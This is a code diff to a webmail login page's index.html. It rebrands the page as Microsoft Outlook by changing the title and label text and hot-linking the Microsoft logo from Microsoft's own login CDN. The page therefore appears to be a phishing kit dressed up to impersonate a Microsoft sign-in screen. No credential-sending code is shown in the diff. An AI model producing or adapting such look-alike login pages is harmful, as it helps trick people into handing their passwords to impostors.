--- a/web/index.html
+++ b/web/index.html
@@ -14,7 +14,7 @@
     <!-- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> -->
     <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
     <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
-    <title class="logoname"> Mail </title>
+    <title class="logoname"> Microsoft Outlook </title>
     <link href="css/hover.css" rel="stylesheet" media="all">
 <!--     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
   <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm">
@@ -107,9 +107,9 @@
 
 
     <div class="login-form">
-	<h2 class="text-center"><div id="top"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/ec/Circle-icons-mail.svg/2048px-Circle-icons-mail.svg.png" alt="Mailbox" id="logoimg" style="height:64px;">
+	<h2 class="text-center"><div id="top"><img src="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft" id="logoimg" style="height:64px;">
 		
-		<span style="vertical-align: middle; padding-left: 5px" class="logoname">Webmail</span> <br></div></h2>
+		<span style="vertical-align: middle; padding-left: 5px" class="logoname">Outlook</span> <br></div></h2>
         
       <form action="#" onsubmit="return false;" >
         <h2 class="text-center"><div id="top2" style="height: 45px;">
@@ -147,7 +147,7 @@
 
       </form>
 
-      <p style="text-align:center"> <a href="#"> Copyright&copy; <span class="logoname2"></span> 2022  </p>
+      <p style="text-align:center"> <a href="#"> Copyright&copy; <span class="logoname2"></span> 2023  </p>
       </a>
     </div>
 
